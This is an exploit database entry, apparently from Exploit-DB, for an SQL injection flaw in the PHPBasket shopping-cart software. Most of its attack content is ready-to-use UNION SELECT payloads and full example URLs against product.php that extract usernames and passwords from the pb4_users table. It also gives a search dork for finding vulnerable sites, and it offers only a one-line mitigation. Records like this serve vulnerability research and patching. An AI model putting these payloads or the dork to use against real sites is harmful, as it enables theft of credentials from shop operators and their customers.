PHPBasket SQL Injection Vulnerability

vendor:

PHPBasket

by:

r45c4l and sinner_01

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHPBasket

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2007

PHPBasket SQL Injection Vulnerability

PHPBasket is vulnerable to SQL injection. Attackers can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by appending malicious SQL queries to the vulnerable parameters in the URL. For example, an attacker can append the following malicious SQL query to the vulnerable parameter in the URL: '2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users--'

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# ---  d3hydr8 - jeed - baltazar - P47r1ck - C1c4Tr1Z - beenu # 
# ---  rsauron  - letsgorun - K1u - DON - OutLawz - MAGE  --- # 
################################################################ 
# 
# Author: r45c4l and sinner_01 
# 
# Home  : www.darkc0de.com & ljuska.org 
# 
# Email : r45c4l@hotmail.com, sinn3r01@gmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# App Name:  PHPBasket 
# 
# Soft.Site: http://www.phpbasket.com/
# 
# Dork: "Powered by PHPBasket" 
# 
# POC-1:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- 
# 
# P0C-2:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users--
# 
#Example: 
#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- 
#
#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users-- 
#
################################################################ 
# Vuln Discovered 17/08/2008 

# milw0rm.com [2008-08-17]